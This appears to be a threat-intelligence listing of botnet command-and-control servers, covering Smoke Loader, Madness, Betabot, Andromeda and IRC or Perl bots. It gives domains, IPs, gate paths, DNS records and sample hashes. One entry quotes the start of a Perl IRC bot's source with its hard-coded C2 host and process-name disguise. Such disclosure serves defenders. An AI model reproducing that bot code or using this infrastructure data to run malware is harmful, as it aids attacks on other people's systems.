Found by Yewnix.
Local users: Current Local Users: 297 Max: 753
Global users: Current Global Users: 884 Max: 1536
Server: 210.205.6.30:6667
Channel: #testdos
Hosting info: http://whois.domaintools.com/210.205.6.30
frineon.su (Smoke loader hosted by fastflux botnet)
Server: frineon.su
Gate file: /forum/index.php
Hosting info:
;; QUESTION SECTION:
;frineon.su. IN A
;; ANSWER SECTION:
frineon.su. 150 IN A 91.188.52.67
frineon.su. 150 IN A 212.92.228.65
frineon.su. 150 IN A 109.200.244.121
frineon.su. 150 IN A 76.66.174.231
frineon.su. 150 IN A 98.218.49.187
frineon.su. 150 IN A 72.185.70.143
frineon.su. 150 IN A 72.185.199.204
frineon.su. 150 IN A ...
irc.teamirc.es (IRC bots hosted in Canada Toronto Cirrus Tech. Ltd.)
Credits to AliSs for this.
Server: irc.teamirc.es:6667
Channel: ##ns##
Now talking in 00##NS##
Topic On: [ ##NS## ] [ 5RanDoM ScAn : 160 – – – 30/11/2013 16:21 12]
Topic By: [ LoSKi ]
Hosting info: http://whois.domaintools.com/199.103.60.15
ajw555.myjino.ru (Madness DDOS botnet hosted by avguro.com)
Resolved ajw555.myjino.ru to 81.177.141.241
Server: ajw555.myjino.ru
Gate file: /index.php
This is the same domain as the previous Madness botnet.
Hosting info: http://whois.domaintools.com/81.177.141.241
Related md5s (Download sample from Malwr.com)
Madness: c45034111810d1a56ba6b72acc63bdf5
dorblu99.net (WordPress bruteforcing botnet hosted by hetzner.de)
Resolved dorblu99.net to 88.198.17.49
Server: dorblu99.net
Gate file: /cmd.php
Hosting info: http://whois.domaintools.com/88.198.17.49
Related md5s (Download sample from Malwr.com)
Malware: 1e8cd0f0f1702820c870302520bc0176
perl.jorgee.nu (5k perl bots hosted in Germany Hurth Intergenia Ag)
Credits to AliSs.
$p = "";
for ($k=0;$k<1300;$k++) { $p .= ",5-$k"; }
my @ps = ("ps","syslogd","init");
my $processo = $ps[rand scalar @ps];
$servidor='perl.jorgee.nu' unless $servidor;
my $porta='8080';
my @canais=("#perl");
my @adms=("M","st0n3d","x00","Jack");
my $linas_max=10;
my $sleep=5;
my $nick = getnick();
my $ircname = "x00";
my $realname = `uname -vr`;
my $uname = `uname -a`;
my ...
xylox.su (Betabot and Andromeda http botnets hosted by Panamaserver.com)
Resolved xylox.su to 190.123.45.12
Betabot Gate file: /forums/order.php
Andromeda Gate file: /foo/image.php
Hosting info: http://whois.domaintools.com/190.123.45.12
Related md5s (Download samples from Malwr.com)
Betabot: a670deb3dd6febfcfda8392305041657
Andromeda: 26c7885b95501af4da1ffa621f793027
shatteredwow.com (Betabot http botnet hosted by limestonenetworks.com)
Resolved shatteredwow.com to 63.143.49.122
Server: shatteredwow.com
Gate file: /beta2/order.php
Alternate domains: modbrandom.netsxyza.dyndns.wsseattleschools.cocnetwork.eltsa.comthex-net.com
Hosting info: http://whois.domaintools.com/63.143.49.122
Related md5s (Download sample from Malwr.com)
Betabot: e5a03d368fd4fca8b45c83a05dab6ced
nomoguz.su (Betabot http botnet hosted by fastflux)
Server: nomoguz.su
Gate file: /SDF9his/yefgvrtu.php
Alternate domain: cooncatcher245.com
The same fastflux setup is also hosting this Betabot.
Hosting info:
;; QUESTION SECTION:
;nomoguz.su. IN A
;; ANSWER SECTION:
nomoguz.su. 131 IN A 5.165.17.205
nomoguz.su. 131 IN A 176.194.193.47
nomoguz.su. 131 IN A 66.231.16.101
nomoguz.su. 131 IN A 145.255.33.9
nomoguz.su. 131 IN A 188.0.98.100
nomoguz.su. 131 ...
nigazz.com (Betabot http botnet hosted by besthosting.ua)
Resolved nigazz.com to 194.28.173.217
Server: nigazz.com
Gate file: /neg/order.php
Alternate domain: niggazz.com
Hosting info: http://whois.domaintools.com/194.28.173.217
Related md5s (Download sample from Malwr.com)
Betabot: 7355a0c56919550566ca50e33162f993